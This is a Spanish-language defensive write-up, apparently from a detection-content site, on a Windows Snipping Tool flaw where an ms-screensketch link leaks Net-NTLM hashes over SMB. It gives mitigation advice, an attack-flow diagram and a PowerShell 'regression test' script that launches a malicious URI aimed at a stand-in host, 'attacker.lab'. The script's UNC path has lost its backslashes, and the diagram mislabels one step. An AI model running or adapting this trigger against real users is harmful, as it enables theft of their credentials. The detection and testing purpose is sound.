Seguir 
Resumen
Una vulnerabilidad en la herramienta de recortes de Windows puede exponer hashes Net-NTLM del usuario actualmente conectado a un atacante remoto. El problema se desencadena a través de un enlace profundo malicioso que abusa del ms-screensketch esquema URI, causando que la herramienta de recortes abra un archivo alojado en un recurso compartido SMB controlado por el atacante. Aunque la víctima debe hacer clic o abrir el enlace diseñado, la filtración de credenciales en sí ocurre silenciosamente en segundo plano cuando Windows inicia la conexión SMB. Este comportamiento puede dar a los atacantes acceso a datos de desafío-respuesta NTLM sin ninguna advertencia visible para el usuario.
Investigación
Los investigadores encontraron que el ms-screensketch protocolo acepta un filePath parámetro y no restringe adecuadamente rutas UNC arbitrarias. Cuando la herramienta de recortes intenta acceder a dicha ruta, Windows intenta automáticamente autenticarse con el servidor SMB remoto, exponiendo la respuesta NTLM en el proceso. Para validar el problema, los investigadores construyeron scripts de prueba de concepto que lanzaron un monitor SMB y generaron un URI malicioso capaz de capturar el hash filtrado.
Mitigación
Microsoft lanzó una actualización de seguridad el 14 de abril de 2026 para abordar el problema eliminando el comportamiento de enlace profundo vulnerable de la herramienta de recortes. Aplicar este parche evita que la aplicación abra automáticamente rutas SMB proporcionadas por el atacante a través de URIs no confiables. Las organizaciones deben priorizar el despliegue de la actualización en sistemas Windows afectados para eliminar la exposición.
Respuesta
Los defensores deben monitorear intentos de invocar el ms-screensketch esquema URI y observar conexiones SMB salientes a hosts internos o externos inusuales. Los sistemas que no requieren la herramienta de recortes deben tener el protocolo restringido donde sea posible, y el despliegue del parche debe ser forzado sin demora. Cualquier hash NTLM expuesto debe ser investigado prontamente por signos de repetición, retransmisión u otro abuso posterior.
graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccffcc %% Nodes action_user_click[«<b>Acción</b> – <b>T1204.001 Ejecución del usuario: Enlace malicioso</b><br/>El usuario hace clic en un enlace malicioso que desencadena la ejecución.»] class action_user_click action tool_snipping[«<b>Herramienta</b> – <b>Nombre</b>: Snipping Tool (URI ms-screensketch)<br/><b>Técnica</b>: T1204 Ejecución del usuario<br/><b>Descripción</b>: Lanzado mediante el manejador de URI ms-screensketch.»] class tool_snipping tool tech_smb_conn[«<b>Técnica</b> – <b>T1550.002 Pass the Hash</b><br/>Snipping Tool procesa un filePath e inicia una conexión SMB a un servidor controlado por el atacante, permitiendo la captura de hashes.»] class tech_smb_conn technique tech_hash_capture[«<b>Técnica</b> – <b>Acceso a credenciales</b><br/>El atacante captura el hash Net-NTLM del intercambio de autenticación SMB.»] class tech_hash_capture technique tech_lateral[«<b>Técnica</b> – <b>T1550.002 Pass the Hash</b><br/>El hash capturado puede reutilizarse para movimiento lateral o escalada de privilegios.»] class tech_lateral technique tech_c2_web[«<b>Técnica</b> – <b>T1071.001 Protocolo de capa de aplicación: Protocolos web</b><br/>El atacante puede usar protocolos web HTTP/S para comunicación de comando y control.»] class tech_c2_web technique tech_persistence[«<b>Técnica</b> – <b>T1574.006 Secuestro del flujo de ejecución: Secuestro del enlazador dinámico</b><br/>Posible persistencia mediante el secuestro del enlazador dinámico del proceso Snipping Tool.»] class tech_persistence technique %% Connections action_user_click –>|executes| tool_snipping tool_snipping –>|initiates SMB| tech_smb_conn tech_smb_conn –>|leads to| tech_hash_capture tech_hash_capture –>|enables| tech_lateral tech_hash_capture –>|enables| tech_c2_web tool_snipping –>|may lead to| tech_persistence
Flujo de Ataque
Ejecución de Simulación
Prerrequisito: La Verificación Previa de Telemetría y Línea de Base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y apuntar a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa de Ataque y Comandos:
Un atacante ha obtenido un punto de apoyo en el puesto de trabajo de la víctima y desea recolectar hashes NTLM sin despertar sospechas. Aprovechando CVE-2026-33829, el atacante crea un
URI ms-screensketch:que apunta a un recurso compartido SMB controlado por el atacante (attacker.labsharepayload.png). Cuando la herramienta de recortes procesa este URI, Windows inicia automáticamente una conexión SMB al servidor remoto, filtrando la respuesta NTLM de la máquina. El atacante ejecuta el URI a través de PowerShell para asegurar que la herramienta de recortes se invoque en el contexto del usuario. -
Script de Prueba de Regresión:
# Filtración NTLM a través de la herramienta de recortes – script de activación # Ajuste la ruta UNC para apuntar a su monitor controlado. $attackerServer = "attacker.lab" $sharePath = "sharepayload.png" $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath" Write-Host "Invocando la herramienta de recortes con URI malicioso..." Start-Process $uri # Espere unos segundos para que se complete el protocolo SMB Start-Sleep -Seconds 5 Write-Host "Invocación completa. Compruebe el SIEM para EventID 3 con DestinationHostname que contenga '$attackerServer'." -
Comandos de Limpieza:
# Eliminar cualquier proceso residual de la herramienta de recortes (si todavía está ejecutándose) Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue | Stop-Process -Force # Opcional: eliminar archivos temporales creados en el lado del atacante (si hay alguno) # (Asume que tiene acceso de escritura al recurso compartido) # Remove-Item -Path "$attackerServer$sharePath" -Force